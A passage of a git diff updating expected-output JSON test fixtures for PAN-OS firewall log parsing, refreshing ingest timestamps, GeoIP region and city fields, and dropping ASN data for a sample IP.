"175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -13193,7 +12738,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.382129200Z", + "ingested": "2021-12-14T14:50:18.748427944Z", "original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:47,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25871,1,59278,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:42.000-04:00", "timezone": "America/New_York", @@ -13218,26 +12763,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -13333,7 +12873,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.382134600Z", + "ingested": "2021-12-14T14:50:18.748428286Z", "original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:47,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25945,1,59277,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:47,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:42.000-04:00", "timezone": "America/New_York", @@ -13458,7 +12998,7 @@ }, "event": { "duration": 1000000000, - "ingested": "2021-12-09T13:43:22.382139900Z", + "ingested": "2021-12-14T14:50:18.748428626Z", "original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,end,1,2012/04/10 04:39:47,192.168.0.2,192.168.0.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25310,1,60026,53,0,0,0x200000,udp,allow,166,166,0,2,2012/04/10 04:39:16,1,any,0,0,0x0,192.168.0.0-192.168.255.255,192.168.0.0-192.168.255.255,0,2,0", "created": "2012-10-30T09:46:42.000-04:00", "timezone": "America/New_York", @@ -13483,26 +13023,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 78, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -13598,7 +13133,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.382145100Z", + "ingested": "2021-12-14T14:50:18.748428974Z", "original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:47,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,27111,1,59276,80,0,0,0x200000,tcp,allow,429,351,78,4,2012/04/10 04:39:47,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,3,1", "created": "2012-10-30T09:46:42.000-04:00", "timezone": "America/New_York", @@ -13623,26 +13158,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 78, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -13738,7 +13268,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.382150400Z", + "ingested": "2021-12-14T14:50:18.748429345Z", "original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:47,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,25398,1,59275,80,0,0,0x200000,tcp,allow,429,351,78,4,2012/04/10 04:39:47,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,3,1", "created": "2012-10-30T09:46:42.000-04:00", "timezone": "America/New_York", @@ -13763,26 +13293,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -13878,7 +13403,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.382155700Z", + "ingested": "2021-12-14T14:50:18.748429685Z", "original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:46,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,23898,1,59274,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:46,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:42.000-04:00", "timezone": "America/New_York", diff --git a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-traffic.json-expected.json b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-traffic.json-expected.json index f827ed55787..c2d178e4928 100644 --- a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-traffic.json-expected.json +++ b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-traffic.json-expected.json @@ -11,26 +11,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -126,7 +121,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:44.429582400Z", + "ingested": "2021-12-14T14:50:40.724497350Z", "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,11449,1,59324,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:59,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:12.000-04:00", "timezone": "America/New_York", diff --git a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-threat-sample.log-expected.json b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-threat-sample.log-expected.json index a84a1cb8b94..96a3d3fe0d6 100644 --- a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-threat-sample.log-expected.json +++ b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-threat-sample.log-expected.json @@ -11,22 +11,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, @@ -157,7 +152,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691648800Z", + "ingested": "2021-12-14T14:50:40.980233955Z", "original": "Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28191,1,52984,443,37679,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7726,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:36.000-05:00", "timezone": "America/New_York", @@ -185,22 +180,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, @@ -331,7 +321,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691658700Z", + "ingested": "2021-12-14T14:50:40.980237054Z", "original": "Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28219,1,52983,443,28249,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7727,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:36.000-05:00", "timezone": "America/New_York", @@ -359,22 +349,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, @@ -505,7 +490,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691665300Z", + "ingested": "2021-12-14T14:50:40.980237615Z", "original": "Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,27723,1,52986,443,63898,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7728,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:36.000-05:00", "timezone": "America/New_York", @@ -533,22 +518,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, @@ -679,7 +659,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691671600Z", + "ingested": "2021-12-14T14:50:40.980238006Z", "original": "Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28172,1,52985,443,7515,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7729,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:36.000-05:00", "timezone": "America/New_York", @@ -707,22 +687,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, @@ -853,7 +828,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691678200Z", + "ingested": "2021-12-14T14:50:40.980238394Z", "original": "Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28151,1,52987,443,3225,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7730,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:36.000-05:00", "timezone": "America/New_York", @@ -881,22 +856,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, @@ -1027,7 +997,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691684500Z", + "ingested": "2021-12-14T14:50:40.980238746Z", "original": "Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28076,1,52988,443,60449,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7731,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:36.000-05:00", "timezone": "America/New_York", @@ -1055,22 +1025,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, @@ -1201,7 +1166,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691690800Z", + "ingested": "2021-12-14T14:50:40.980239098Z", "original": "Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28173,1,52990,443,60559,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7732,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:36.000-05:00", "timezone": "America/New_York", @@ -1229,22 +1194,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, @@ -1375,7 +1335,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691697200Z", + "ingested": "2021-12-14T14:50:40.980239515Z", "original": "Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28186,1,52989,443,47414,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7733,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:36.000-05:00", "timezone": "America/New_York", @@ -1403,22 +1363,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, @@ -1549,7 +1504,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691703400Z", + "ingested": "2021-12-14T14:50:40.980239871Z", "original": "Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28192,1,52992,443,37673,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7734,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:36.000-05:00", "timezone": "America/New_York", @@ -1577,22 +1532,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, @@ -1723,7 +1673,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691709700Z", + "ingested": "2021-12-14T14:50:40.980240235Z", "original": "Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,27011,1,52991,443,8232,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7735,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:36.000-05:00", "timezone": "America/New_York", @@ -1751,22 +1701,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, @@ -1897,7 +1842,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691716Z", + "ingested": "2021-12-14T14:50:40.980240583Z", "original": "Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28240,1,52994,443,32982,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7736,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:36.000-05:00", "timezone": "America/New_York", @@ -1925,22 +1870,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, @@ -2071,7 +2011,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691721800Z", + "ingested": "2021-12-14T14:50:40.980241146Z", "original": "Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28143,1,52993,443,10473,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7737,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:36.000-05:00", "timezone": "America/New_York", @@ -2099,22 +2039,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, @@ -2245,7 +2180,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691725600Z", + "ingested": "2021-12-14T14:50:40.980241510Z", "original": "Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28272,1,52995,443,20446,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7738,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:36.000-05:00", "timezone": "America/New_York", @@ -2273,22 +2208,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, @@ -2419,7 +2349,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691730700Z", + "ingested": "2021-12-14T14:50:40.980241862Z", "original": "Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28146,1,52996,443,34699,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7739,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:36.000-05:00", "timezone": "America/New_York", @@ -2447,22 +2377,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, @@ -2593,7 +2518,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691736400Z", + "ingested": "2021-12-14T14:50:40.980242212Z", "original": "Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28278,1,52997,443,22820,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7740,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:36.000-05:00", "timezone": "America/New_York", @@ -2621,22 +2546,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, @@ -2767,7 +2687,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691741900Z", + "ingested": "2021-12-14T14:50:40.980242552Z", "original": "Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:37,012801096514,THREAT,url,2049,2018/11/30 16:44:37,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 